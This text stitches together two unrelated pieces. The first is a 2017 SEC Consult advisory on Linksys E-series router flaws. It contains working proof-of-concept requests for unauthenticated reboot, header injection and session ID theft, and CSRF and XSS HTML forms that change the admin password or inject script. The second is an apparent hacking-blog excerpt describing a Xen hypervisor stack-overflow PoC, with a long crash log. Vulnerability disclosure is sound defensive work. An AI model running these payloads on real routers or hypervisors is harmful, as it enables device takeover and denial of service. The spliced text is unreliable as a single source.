SEC Consult Vulnerability Lab Security Advisory < 20171018-1 >
=======================================================================
title: Multiple vulnerabilities
product: Linksys E series, see "Vulnerable / tested versions"
vulnerable version: see "Vulnerable / tested versions"
fixed version: no public fix, see solution/timeline
CVE number: -
impact: high
homepage: http://www.linksys.com/
found: 2017-06-26
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Today, Belkin International has three brands – Belkin, Linksys and WeMo
– to enhance the technology that connects us to the people, activities
and experiences we love. Belkin products are renowned for their
simplicity and ease of use, while our Linksys brand helped make
wireless connectivity mainstream around the globe. Our newest brand,
WeMo, is the leader in delivering customizable smart home experiences.
Its product platform empowers people to monitor, measure and manage
their electronics, appliances and lighting at home and on-the-go."
Source: http://www.belkin.com/uk/aboutUs/
Business recommendation:
------------------------
SEC Consult recommends not to use this product in a production environment
until a thorough security review has been performed by security
professionals and all identified issues have been resolved.
Vulnerability overview/description:
-----------------------------------
1) Denial of Service (DoS)
A denial of service vulnerability is present in the web server of the
device. This vulnerability is very simple to trigger since a single GET
request to a cgi-script is sufficient.
A crafted GET request, e.g. triggered by CSRF over a user in the
internal network, can reboot the whole device or freeze the web interface
and the DHCP service. This action does not require authentication.
2) HTTP Header Injection & Open Redirect
Due to a flaw in the web service a header injection can be triggered
without authentication. This kind of vulnerability can be used to perform
different arbitrary actions. One example in this case is an open redirection
to another web site. In the worst case a session ID of an authenticated user
can be stolen this way because the session ID is embedded into the url
which is another flaw of the web service.
3) Improper Session-Protection
The session ID for administrative users can be fetched from the device from
LAN without credentials because of insecure session handling.
This vulnerability can only be exploited when an administrator was
authenticated to the device before the attack and opened a session previously.
The login works if the attacker has the same IP address as the PC
of the legitimate administrator. Therefore, a CSRF attack is possible when
the administrator is lured to surf on a malicious web site or to click on
a malicious link.
4) Cross-Site Request Forgery Vulnerability in Admin Interface
A cross-site request forgery vulnerability can be triggered in the
administrative interface. This vulnerability can be exploited because the
session ID can be hijacked by using 3) via LAN. An exploitation via internet
is only possible if the session id is exposed to the internet (for example via
the referrer).
An attacker can change any configuration of the device by luring a user to
click on a malicious link or surf to a malicious web-site.
5) Cross-Site Scripting Vulnerability in Admin Interface
A cross-site scripting vulnerability can be triggered in the administrative
interface. This vulnerability can be exploited because the session ID can
be hijacked by using 3) via LAN. An exploitation via internet is only possible
if the session id is exposed to the internet (for example via the referrer).
By using this vulnerability, malicious code can be executed in the context of
the browser session of the attacked user.
Proof of concept:
-----------------
1) Denial of Service
Unauthenticated request for triggering a router reboot in browser:
http://<Router-IP>/upgrade.cgi
http://<Router-IP>/restore.cgi
Unauthenticated request for triggering a router freeze in browser:
http://<Router-IP>/mfgtst.cgi
2) HTTP Header Injection & Open Redirect
A header injection can be triggered by the following unauthenticated request:
Request:
------------------------------------------------------------------------------
POST /UnsecuredEnable.cgi HTTP/1.1
Host: <Router-IP>
Accept: */*
Accept-Language: en
Connection: close
Referer: http://<Router-IP>/Unsecured.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
submit_type=&submit_button=UnsecuredEnable&gui_action=Apply&wait_time=19&next_url=INJEC%0d%0aTION&change_action=
------------------------------------------------------------------------------
Response:
------------------------------------------------------------------------------
HTTP/1.1 302 Redirect
Server: httpd
Date: Thu, 01 Jan 1970 00:27:41 GMT
Location: http://INJEC
TION
Content-Type: text/plain
Connection: close
------------------------------------------------------------------------------
Setting a new location will result in an open redirect:
Request:
------------------------------------------------------------------------------
POST /UnsecuredEnable.cgi HTTP/1.1
Host: <Router-IP>
Accept: */*
Accept-Language: en
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
submit_type=&submit_button=UnsecuredEnable&gui_action=Apply&wait_time=19&next_url=www.sec-consult.com&change_action=
------------------------------------------------------------------------------
Response:
------------------------------------------------------------------------------
HTTP/1.1 302 Redirect
Server: httpd
Date: Thu, 01 Jan 1970 00:27:57 GMT
Location: http://www.sec-consult.com
Content-Type: text/plain
Connection: close
------------------------------------------------------------------------------
3) Improper Session-Protection
These two requests can be used to fetch the current session ID of an authenticated
user.
http://<Device-IP>/BlockTime.asp
http://<Device-IP>/BlockSite.asp
The response is nearly the same (except the "inetblock" and "blocksite"
functions):
-------------------------------------------------------------------------------
HTTP/1.1 200 Ok
Server: httpd
Date: Thu, 01 Jan 1970 00:04:32 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/html
[...]
function init()
{
var close_session = "0";
if ( close_session == "1" )
{
document.forms[0].action= "hndUnblock.cgi";
}
else
{
document.forms[0].action= "hndUnblock.cgi?session_id=<Session-ID>";
}
}
</script>
</head>
<body id="blocked" onload=init()>
<div id="content">
<div class="h1">
<h1><span><script>Capture(hndmsg.blocksite)</script>
</span>
</h1>
</div>
[...]
</body>
</html>
-------------------------------------------------------------------------------
4) Cross-Site Request Forgery Vulnerability in Admin Interface
The following proof of concept HTML code can change the router password by
exploiting CSRF after replacing the <Session-ID> with the fetched one from 3).
The new password is "secconsult".
-------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/apply.cgi?session_id=<Session-ID>" method="POST">
<input type="hidden" name="submit_button" value="Management" />
<input type="hidden" name="change_action" value="" />
<input type="hidden" name="gui_action" value="Apply" />
<input type="hidden" name="PasswdModify" value="1" />
<input type="hidden" name="http_enable" value="1" />
<input type="hidden" name="https_enable" value="0" />
<input type="hidden" name="ctm404_enable" value="" />
<input type="hidden" name="remote_mgt_https" value="0" />
<input type="hidden" name="wait_time" value="4" />
<input type="hidden" name="need_reboot" value="0" />
<input type="hidden" name="http_passwd" value="secconsult" />
<input type="hidden" name="http_passwdConfirm" value="secconsult" />
<input type="hidden" name="_http_enable" value="1" />
<input type="hidden" name="web_wl_filter" value="0" />
<input type="hidden" name="remote_management" value="0" />
<input type="hidden" name="nf_alg_sip" value="0" />
<input type="hidden" name="upnp_enable" value="1" />
<input type="hidden" name="upnp_config" value="1" />
<input type="hidden" name="upnp_internet_dis" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
-------------------------------------------------------------------------------
5) Cross-Site Scripting Vulnerability in Admin Interface
The <Session-ID> must be replaced again. The "apply.cgi" script can be abused
to trigger the cross-site scripting vulnerability.
-------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/apply.cgi?session_id=<Session-ID>" method="POST">
<input type="hidden" name="submit_button" value="index" />
<input type="hidden" name="change_action" value="" />
<input type="hidden" name="submit_type" value="" />
<input type="hidden" name="gui_action" value="Apply" />
<input type="hidden" name="now_proto" value="dhcp" />
<input type="hidden" name="daylight_time" value="1" />
<input type="hidden" name="switch_mode" value="0" />
<input type="hidden" name="hnap_devicename" value="csrft_POC" />
<input type="hidden" name="need_reboot" value="0" />
<input type="hidden" name="user_language" value="" />
<input type="hidden" name="wait_time" value="1';alert('XSS-PoC')//155" />
<input type="hidden" name="dhcp_start" value="100" />
<input type="hidden" name="dhcp_start_conflict" value="0" />
<input type="hidden" name="lan_ipaddr" value="4" />
<input type="hidden" name="ppp_demand_pppoe" value="9" />
<input type="hidden" name="ppp_demand_pptp" value="9" />
<input type="hidden" name="ppp_demand_l2tp" value="9" />
<input type="hidden" name="ppp_demand_hb" value="9" />
<input type="hidden" name="wan_ipv6_proto" value="dhcp" />
<input type="hidden" name="detect_lang" value="en" />
<input type="hidden" name="wan_proto" value="dhcp" />
<input type="hidden" name="wan_hostname" value="" />
<input type="hidden" name="wan_domain" value="" />
<input type="hidden" name="mtu_enable" value="0" />
<input type="hidden" name="lan_ipaddr_0" value="192" />
<input type="hidden" name="lan_ipaddr_1" value="168" />
<input type="hidden" name="lan_ipaddr_2" value="1" />
<input type="hidden" name="lan_ipaddr_3" value="1" />
<input type="hidden" name="lan_netmask" value="255.255.255.0" />
<input type="hidden" name="machine_name" value="Linksys09355" />
<input type="hidden" name="lan_proto" value="dhcp" />
<input type="hidden" name="dhcp_check" value="" />
<input type="hidden" name="dhcp_start_tmp" value="100" />
<input type="hidden" name="dhcp_num" value="50" />
<input type="hidden" name="dhcp_lease" value="0" />
<input type="hidden" name="wan_dns" value="4" />
<input type="hidden" name="wan_dns0_0" value="0" />
<input type="hidden" name="wan_dns0_1" value="0" />
<input type="hidden" name="wan_dns0_2" value="0" />
<input type="hidden" name="wan_dns0_3" value="0" />
<input type="hidden" name="wan_dns1_0" value="0" />
<input type="hidden" name="wan_dns1_1" value="0" />
<input type="hidden" name="wan_dns1_2" value="0" />
<input type="hidden" name="wan_dns1_3" value="0" />
<input type="hidden" name="wan_dns2_0" value="0" />
<input type="hidden" name="wan_dns2_1" value="0" />
<input type="hidden" name="wan_dns2_2" value="0" />
<input type="hidden" name="wan_dns2_3" value="0" />
<input type="hidden" name="wan_wins" value="4" />
<input type="hidden" name="wan_wins_0" value="0" />
<input type="hidden" name="wan_wins_1" value="0" />
<input type="hidden" name="wan_wins_2" value="0" />
<input type="hidden" name="wan_wins_3" value="0" />
<input type="hidden" name="time_zone" value="-08 1 1" />
<input type="hidden" name="_daylight_time" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
-------------------------------------------------------------------------------
Vulnerable / tested versions:
-----------------------------
Linksys E2500 - 3.0.02 (build 2)
According to the Linksys security contact the following products are
affected too:
Linksys E900 (Version: 1.0.06)
Linksys E1200 (Version: 2.0.07 Build 5)
Linksys E8400 AC2400 Dual-Band Wi-Fi Router (Version: basic version ?)
Based on information embedded in the firmware of other Linksys products
gathered from our IoT Inspector tool we believe the following devices
are affected as well:
Linksys E900 (Version: 1.0.06) -- confirmed by vendor
Linksys E900-ME (Version: 1.0.06)
Linksys E1200 (Version: 2.0.07 Build 5) -- confirmed by vendor
Linksys E1500 (Version: 1.0.06 Build 1)
Linksys E3200 (Version: 1.0.05 Build 2)
Linksys E4200 (Version: 1.0.06 Build 3)
Linksys WRT54G2 (Version: 1.5.02 Build 5)
Vendor contact timeline:
------------------------
2017-07-10: Contacting vendor through security@linksys.com. Set release date
to 2017-08-29.
2017-07-12: Confirmation of recipient. The contact also states that
the unit is older and they have to look for it.
2017-08-07: Asking for update; Contact responds that they have to look for
such a unit in their inventory.
2017-08-08: Contact responds that he verified three of four vulnerabilities.
2017-08-09: Sent PCAP dump and more information about vulnerability #4 to
assist the contact with verification.
2017-08-18: Sending new advisory version to contact and asking for an update;
No answer.
2017-08-22: Asking for an update; Contact states that he is trying to get a
fixed firmware from the OEM.
2017-08-24: Asked the vendor how much additional time he will need.
2017-08-25: Vendor states that it is difficult to get an update from the OEM
due to the age of the product ("Many of the engineers who
originally worked on this code base are no longer with the
company"). Clarified some CORS/SOP issues which were
misunderstood.
2017-08-30: Sending Proof of Concept for CSRF/XSS as HTML files to the vendor.
Changed the vulnerability description of the advisory to
explain the possibility of exploiting the CSRF/XSS vulnerabilities
from LAN and WAN side.
2017-09-07: Asking for an update; Vendor agrees with the new vulnerability
descriptions and states that the OEM got back to them with a fix
for the E2500 and they are in the QA phase. The vendor is expecting
fixes for E900, E1200, and E8400 later this week or next week to
hand them over to QA.
2017-09-07: Stated that E8400 was not found by the IoT Inspector because there
was no firmware available to download online. Stated that it will
be available in the next version of the advisory. Shifting the
advisory release to 2017-09-26.
Asking for confirmation of the other reported devices:
Linksys E900-ME (Version: 1.0.06)
Linksys E1500 (Version: 1.0.06 Build 1)
Linksys E3200 (Version: 1.0.05 Build 2)
Linksys E4200 (Version: 1.0.06 Build 3)
Linksys WRT54G2 (Version: 1.5.02 Build 5)
No answer.
2017-09-18: Sending new version of the advisory to the vendor. Asking for an
update; No answer.
2017-09-21: Asking for an update; No answer.
2017-09-26: Asking for an update; No answer.
2017-10-02: Asking for an update and shifting the advisory release to
2017-10-09; No answer.
2017-10-16: Informing the vendor that the advisory will be released on
2017-10-18 because vendor is unresponsive.
2017-10-18: Public release of security advisory
Solution:
---------
Upgrade to new firmware version as soon as the vendor publishes it.
Workaround:
-----------
Restrict network access to the device.
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF T. Weber / @2017
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863144422
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Xen allows pagetables of the same level to map each other as readonly
in PV domains. This is useful if a guest wants to use the
self-referential pagetable trick for easy access to pagetables
by mapped virtual address.
When cleaning up a pagetable after the last typed reference to it has been
dropped (via __put_page_type() -> __put_final_page_type() -> free_page_type()),
Xen will recursively drop the typed refcounts of pages referenced by the pagetable,
potentially recursively cleaning them up as well.
For normal pagetables, the recursion depth is bounded by the number of paging levels
the architecture supports. However, no such depth limit exists for pagetables of the
same depth that map each other.
The attached PoC will set up a chain of 1000 L4 pagetables such that
the first pagetable is type-pinned and each following pagetable is referenced by the
previous one. Then, the type-pin of the first pagetable is removed, and the following
999 pagetables are recursively cleaned up, causing a stack overflow.
To run the PoC in a PV domain, install kernel headers, then run ./compile, then load the built module via insmod.
Xen console output caused by running the PoC inside a normal PV domain:
==============================
(XEN) Xen version 4.8.1 (Debian 4.8.1-1+deb9u3) (ian.jackson@eu.citrix.com) (gcc (Debian 6.3.0-18) 6.3.0 20170516) debug=n Thu Sep 7 18:24:26 UTC 2017
(XEN) Bootloader: GRUB 2.02~beta3-5
(XEN) Command line: loglvl=all com1=115200,8n1,pci console=com1 placeholder
(XEN) Video information:
(XEN) VGA is text mode 80x25, font 8x16
(XEN) Disc information:
(XEN) Found 1 MBR signatures
(XEN) Found 1 EDD information structures
(XEN) Xen-e820 RAM map:
(XEN) 0000000000000000 - 000000000009fc00 (usable)
(XEN) 000000000009fc00 - 00000000000a0000 (reserved)
(XEN) 00000000000f0000 - 0000000000100000 (reserved)
(XEN) 0000000000100000 - 00000000dfff0000 (usable)
(XEN) 00000000dfff0000 - 00000000e0000000 (ACPI data)
(XEN) 00000000fec00000 - 00000000fec01000 (reserved)
(XEN) 00000000fee00000 - 00000000fee01000 (reserved)
(XEN) 00000000fffc0000 - 0000000100000000 (reserved)
(XEN) 0000000100000000 - 0000000120000000 (usable)
(XEN) ACPI: RSDP 000E0000, 0024 (r2 VBOX )
(XEN) ACPI: XSDT DFFF0030, 003C (r1 VBOX VBOXXSDT 1 ASL 61)
(XEN) ACPI: FACP DFFF00F0, 00F4 (r4 VBOX VBOXFACP 1 ASL 61)
(XEN) ACPI: DSDT DFFF0470, 210F (r1 VBOX VBOXBIOS 2 INTL 20140214)
(XEN) ACPI: FACS DFFF0200, 0040
(XEN) ACPI: APIC DFFF0240, 0054 (r2 VBOX VBOXAPIC 1 ASL 61)
(XEN) ACPI: SSDT DFFF02A0, 01CC (r1 VBOX VBOXCPUT 2 INTL 20140214)
(XEN) System RAM: 4095MB (4193852kB)
(XEN) No NUMA configuration found
(XEN) Faking a node at 0000000000000000-0000000120000000
(XEN) Domain heap initialised
(XEN) CPU Vendor: Intel, Family 6 (0x6), Model 78 (0x4e), Stepping 3 (raw 000406e3)
(XEN) found SMP MP-table at 0009fff0
(XEN) DMI 2.5 present.
(XEN) Using APIC driver default
(XEN) ACPI: PM-Timer IO Port: 0x4008 (32 bits)
(XEN) ACPI: SLEEP INFO: pm1x_cnt[1:4004,1:0], pm1x_evt[1:4000,1:0]
(XEN) ACPI: wakeup_vec[dfff020c], vec_size[20]
(XEN) ACPI: Local APIC address 0xfee00000
(XEN) ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled)
(XEN) ACPI: IOAPIC (id[0x01] address[0xfec00000] gsi_base[0])
(XEN) IOAPIC[0]: apic_id 1, version 32, address 0xfec00000, GSI 0-23
(XEN) ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
(XEN) ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level)
(XEN) ACPI: IRQ0 used by override.
(XEN) ACPI: IRQ2 used by override.
(XEN) ACPI: IRQ9 used by override.
(XEN) Enabling APIC mode: Flat. Using 1 I/O APICs
(XEN) ERST table was not found
(XEN) Using ACPI (MADT) for SMP configuration information
(XEN) SMP: Allowing 1 CPUs (0 hotplug CPUs)
(XEN) IRQ limits: 24 GSI, 184 MSI/MSI-X
(XEN) Not enabling x2APIC: depends on iommu_supports_eim.
(XEN) xstate: size: 0x440 and states: 0x7
(XEN) CPU0: No MCE banks present. Machine check support disabled
(XEN) Using scheduler: SMP Credit Scheduler (credit)
(XEN) Platform timer is 3.579MHz ACPI PM Timer
(XEN) Detected 2807.850 MHz processor.
(XEN) Initing memory sharing.
(XEN) alt table ffff82d0802bcf38 -> ffff82d0802be594
(XEN) I/O virtualisation disabled
(XEN) nr_sockets: 1
(XEN) ENABLING IO-APIC IRQs
(XEN) -> Using new ACK method
(XEN) ..TIMER: vector=0xF0 apic1=0 pin1=2 apic2=-1 pin2=-1
(XEN) Allocated console ring of 16 KiB.
(XEN) Brought up 1 CPUs
(XEN) build-id: cd504b2b380e2fe1265376aa845a404b9eb86982
(XEN) CPUIDLE: disabled due to no HPET. Force enable with 'cpuidle'.
(XEN) ACPI sleep modes: S3
(XEN) VPMU: disabled
(XEN) xenoprof: Initialization failed. Intel processor family 6 model 78is not supported
(XEN) Dom0 has maximum 208 PIRQs
(XEN) NX (Execute Disable) protection active
(XEN) *** LOADING DOMAIN 0 ***
(XEN) Xen kernel: 64-bit, lsb, compat32
(XEN) Dom0 kernel: 64-bit, PAE, lsb, paddr 0x1000000 -> 0x1f5a000
(XEN) PHYSICAL MEMORY ARRANGEMENT:
(XEN) Dom0 alloc.: 0000000118000000->000000011a000000 (989666 pages to be allocated)
(XEN) Init. ramdisk: 000000011ed74000->000000011ffff3b5
(XEN) VIRTUAL MEMORY ARRANGEMENT:
(XEN) Loaded kernel: ffffffff81000000->ffffffff81f5a000
(XEN) Init. ramdisk: 0000000000000000->0000000000000000
(XEN) Phys-Mach map: 0000008000000000->00000080007a6370
(XEN) Start info: ffffffff81f5a000->ffffffff81f5a4b4
(XEN) Page tables: ffffffff81f5b000->ffffffff81f6e000
(XEN) Boot stack: ffffffff81f6e000->ffffffff81f6f000
(XEN) TOTAL: ffffffff80000000->ffffffff82000000
(XEN) ENTRY ADDRESS: ffffffff81d38180
(XEN) Dom0 has maximum 1 VCPUs
(XEN) Scrubbing Free RAM on 1 nodes using 1 CPUs
(XEN) ....................................done.
(XEN) Initial low memory virq threshold set at 0x4000 pages.
(XEN) Std. Loglevel: All
(XEN) Guest Loglevel: Nothing (Rate-limited: Errors and warnings)
(XEN) *** Serial input -> DOM0 (type 'CTRL-a' three times to switch input to Xen)
(XEN) Freed 312kB init memory
mapping kernel into physical memory
about to get started...
(XEN) d0 attempted to change d0v0's CR4 flags 00000620 -> 00040660
(XEN) PCI add device 0000:00:00.0
(XEN) PCI add device 0000:00:01.0
(XEN) PCI add device 0000:00:01.1
(XEN) PCI add device 0000:00:02.0
(XEN) PCI add device 0000:00:03.0
(XEN) PCI add device 0000:00:04.0
(XEN) PCI add device 0000:00:05.0
(XEN) PCI add device 0000:00:06.0
(XEN) PCI add device 0000:00:07.0
(XEN) PCI add device 0000:00:08.0
(XEN) PCI add device 0000:00:0d.0
Debian GNU/Linux 9 xenhost hvc0
xenhost login: (XEN) d1 attempted to change d1v0's CR4 flags 00000620 -> 00040660
(XEN) d1 attempted to change d1v1's CR4 flags 00000620 -> 00040660
(XEN) *** DOUBLE FAULT ***
(XEN) ----[ Xen-4.8.1 x86_64 debug=n Not tainted ]----
(XEN) CPU: 0
(XEN) RIP: e008:[<ffff82d08017962a>] free_page_type+0xea/0x630
(XEN) RFLAGS: 0000000000010206 CONTEXT: hypervisor
(XEN) rax: 000000000000a3db rbx: ffff82e000147b60 rcx: 0000000000000000
(XEN) rdx: ffff830000000000 rsi: 4000000000000000 rdi: 000000000000a3db
(XEN) rbp: 4400000000000001 rsp: ffff8300dfce5ff8 r8: ffff8300dfce7fff
(XEN) r9: ffff82d0802f2980 r10: 0000000000000000 r11: 0000000000000202
(XEN) r12: 000000000000a3db r13: ffff83011fd74000 r14: ffff83011fd74000
(XEN) r15: 0000000000000000 cr0: 000000008005003b cr4: 00000000000406a0
(XEN) cr3: 000000000702d000 cr2: ffff8300dfce5fe8
(XEN) ds: 0000 es: 0000 fs: 0000 gs: 0000 ss: e010 cs: e008
(XEN) Valid stack range: ffff8300dfce6000-ffff8300dfce8000, sp=ffff8300dfce5ff8, tss.esp0=ffff8300dfce7fc0
(XEN) Xen stack overflow (dumping trace ffff8300dfce6000-ffff8300dfce8000):
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d08016af21>] io_apic.c#ack_edge_ioapic_irq+0x11/0x60
(XEN) [<ffff82d08016af21>] io_apic.c#ack_edge_ioapic_irq+0x11/0x60
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d0801793ae>] mm.c#get_page_from_pagenr+0x4e/0x60
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d0801768e9>] is_iomem_page+0x9/0x70
(XEN) [<ffff82d08010baec>] grant_table.c#__gnttab_unmap_common_complete+0x17c/0x360
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080146684>] serial_tx_interrupt+0xe4/0x120
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017234a>] do_IRQ+0x22a/0x660
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080237f6f>] common_interrupt+0x5f/0x70
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d08017a028>] put_page_from_l1e+0xb8/0x130
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
